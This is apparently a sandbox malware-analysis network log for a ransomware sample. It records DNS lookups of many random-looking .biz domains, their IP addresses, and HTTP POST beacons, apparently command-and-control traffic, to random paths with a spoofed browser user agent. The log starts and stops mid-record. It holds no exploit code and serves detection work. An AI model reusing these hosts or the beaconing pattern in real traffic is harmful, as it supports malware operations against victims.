User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=257f7a4e20e7e1605dbd4bc8176404b9|191.101.209.39|1717923876|1717923876|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mnjmhp.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mnjmhp.biz

IN A

Response

mnjmhp.biz

IN A

44.200.43.61
DNS

mnjmhp.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mnjmhp.biz

IN A

Response

mnjmhp.biz

IN A

107.178.223.183

mnjmhp.biz

IN A

104.155.138.21
POST

http://mnjmhp.biz/hhunm

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.200.43.61:80

Request

POST /hhunm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=72e3db80ebd50703aa1e5be5900e11d7|191.101.209.39|1717923876|1717923876|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

opowhhece.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

opowhhece.biz

IN A

Response

opowhhece.biz

IN A

18.208.156.248
POST

http://opowhhece.biz/q

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /q HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f8354c6dcc41d2123e412ec432bece57|191.101.209.39|1717923876|1717923876|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ecxbwt.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ecxbwt.biz

IN A

Response

ecxbwt.biz

IN A

54.244.188.177
POST

http://ecxbwt.biz/qhl

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /qhl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ecxbwt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2c2d423ebdfa800bfc2c03a6b71e61b4|191.101.209.39|1717923877|1717923877|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zjbpaao.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zjbpaao.biz

IN A

Response
DNS

zjbpaao.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zjbpaao.biz

IN A

Response
DNS

jdhhbs.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jdhhbs.biz

IN A

Response

jdhhbs.biz

IN A

13.251.16.150
POST

http://jdhhbs.biz/fuwjpxefqbbqjmjh

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /fuwjpxefqbbqjmjh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=175ddd002b5f824b7e66b2cdb3bf3022|191.101.209.39|1717923877|1717923877|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pectx.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pectx.biz

IN A

Response

pectx.biz

IN A

44.213.104.86
DNS

pectx.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pectx.biz

IN A

Response

pectx.biz

IN A

44.213.104.86
POST

http://pectx.biz/rem

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.213.104.86:80

Request

POST /rem HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=441541fde1fd9cc861e30a0b65d745b5|191.101.209.39|1717923877|1717923877|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zyiexezl.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zyiexezl.biz

IN A

Response

zyiexezl.biz

IN A

54.80.154.23
DNS

zyiexezl.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zyiexezl.biz

IN A

Response

zyiexezl.biz

IN A

54.80.154.23
POST

http://zyiexezl.biz/iqgplaixgknxrgd

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /iqgplaixgknxrgd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5390efc8831c0278221e42ac9139b2d2|191.101.209.39|1717923877|1717923877|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

banwyw.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

banwyw.biz

IN A

Response

banwyw.biz

IN A

3.237.86.197
DNS

banwyw.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

banwyw.biz

IN A

Response

banwyw.biz

IN A

3.237.86.197
POST

http://banwyw.biz/djkxmsqk

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.237.86.197:80

Request

POST /djkxmsqk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=450a2c84e31514bd55b249aed6b70f6d|191.101.209.39|1717923877|1717923877|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mgmsclkyu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mgmsclkyu.biz

IN A

Response

mgmsclkyu.biz

IN A

34.246.200.160
POST

http://mgmsclkyu.biz/bh

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.246.200.160:80

Request

POST /bh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e1fedf97eb231c110b344313524856a8|191.101.209.39|1717923878|1717923878|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

muapr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

muapr.biz

IN A

Response
DNS

muapr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

muapr.biz

IN A

Response
DNS

wxgzshna.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

wxgzshna.biz

IN A

Response
DNS

zrlssa.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zrlssa.biz

IN A

Response

zrlssa.biz

IN A

3.237.86.197
DNS

zrlssa.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zrlssa.biz

IN A

Response

zrlssa.biz

IN A

3.237.86.197
POST

http://zrlssa.biz/lkoajbrr

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.237.86.197:80

Request

POST /lkoajbrr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zrlssa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=93fe6966ca8d27651e20148eb16d396c|191.101.209.39|1717923878|1717923878|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

warkcdu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

warkcdu.biz

IN A

Response

warkcdu.biz

IN A

18.141.10.107
DNS

warkcdu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

warkcdu.biz

IN A

Response

warkcdu.biz

IN A

18.141.10.107
POST

http://warkcdu.biz/gsnwjbanfgexf

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /gsnwjbanfgexf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=052da7479d100ba8314050ee010eb5cb|191.101.209.39|1717923878|1717923878|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jlqltsjvh.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jlqltsjvh.biz

IN A

Response

jlqltsjvh.biz

IN A

18.141.10.107
POST

http://jlqltsjvh.biz/jdg

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /jdg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jlqltsjvh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e5587d3c02cc5f066318d3edbfa392cf|191.101.209.39|1717923879|1717923879|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gcedd.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gcedd.biz

IN A

Response

gcedd.biz

IN A

13.251.16.150
POST

http://gcedd.biz/b

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /b HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dc6a48366c7ede29edec1191e02665a7|191.101.209.39|1717923880|1717923880|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xyrgy.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xyrgy.biz

IN A

Response

xyrgy.biz

IN A

54.80.154.23
POST

http://xyrgy.biz/fiwn

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /fiwn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xyrgy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=61918c755507bdcd0a652c1f2a0633e5|191.101.209.39|1717923879|1717923879|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

htwqzczce.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

htwqzczce.biz

IN A

Response

htwqzczce.biz

IN A

44.208.124.139

htwqzczce.biz

IN A

34.193.97.35

htwqzczce.biz

IN A

54.157.24.8
POST

http://htwqzczce.biz/amstwqsytpj

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.208.124.139:80

Request

POST /amstwqsytpj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876
POST

http://htwqzczce.biz/tfjpa

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.208.124.139:80

Request

POST /tfjpa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876
DNS

139.124.208.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

139.124.208.44.in-addr.arpa

IN PTR

Response

139.124.208.44.in-addr.arpa

IN PTR

ec2-44-208-124-139 compute-1 amazonawscom
DNS

139.124.208.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

139.124.208.44.in-addr.arpa

IN PTR

Response

139.124.208.44.in-addr.arpa

IN PTR

ec2-44-208-124-139 compute-1 amazonawscom
DNS

kvbjaur.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

kvbjaur.biz

IN A

Response

kvbjaur.biz

IN A

54.244.188.177
DNS

kvbjaur.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

kvbjaur.biz

IN A

Response

kvbjaur.biz

IN A

54.244.188.177
POST

http://kvbjaur.biz/ogch

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /ogch HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kvbjaur.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=003b23d2d8e2339af23ce5f86e80c2cf|191.101.209.39|1717923880|1717923880|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jwkoeoqns.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jwkoeoqns.biz

IN A

Response

jwkoeoqns.biz

IN A

18.208.156.248
DNS

jwkoeoqns.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jwkoeoqns.biz

IN A

Response

jwkoeoqns.biz

IN A

18.208.156.248
POST

http://jwkoeoqns.biz/em

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /em HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1fdef131121b04a1aa26c973109f3349|191.101.209.39|1717923880|1717923880|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xccjj.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xccjj.biz

IN A

Response

xccjj.biz

IN A

44.213.104.86
DNS

xccjj.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xccjj.biz

IN A

Response

xccjj.biz

IN A

44.213.104.86
POST

http://xccjj.biz/jfnpesnlhlqmu

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.213.104.86:80

Request

POST /jfnpesnlhlqmu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=40b4247109869484eec201515c5a9ac4|191.101.209.39|1717923880|1717923880|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uphca.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uphca.biz

IN A

Response

uphca.biz

IN A

44.221.84.105
DNS

hehckyov.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

hehckyov.biz

IN A

Response

hehckyov.biz

IN A

44.221.84.105
POST

http://uphca.biz/ntlegpblxuknqmv

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.221.84.105:80

Request

POST /ntlegpblxuknqmv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uphca.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=277443737a4f0b6d0a0d5c3f31946d96|191.101.209.39|1717923880|1717923880|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://hehckyov.biz/fciw

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /fciw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2f5d8b733859ee0d952f9819e5cdaf06|191.101.209.39|1717923880|1717923880|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fjumtfnz.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

fjumtfnz.biz

IN A

Response

fjumtfnz.biz

IN A

34.211.97.45
POST

http://fjumtfnz.biz/jqhdai

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /jqhdai HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fjumtfnz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=93884bd586f431ba577d96a2ba063d77|191.101.209.39|1717923881|1717923881|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rynmcq.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rynmcq.biz

IN A

Response

rynmcq.biz

IN A

54.244.188.177
POST

http://rynmcq.biz/kvtwjctltflmkpp

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /kvtwjctltflmkpp HTTP/1.1
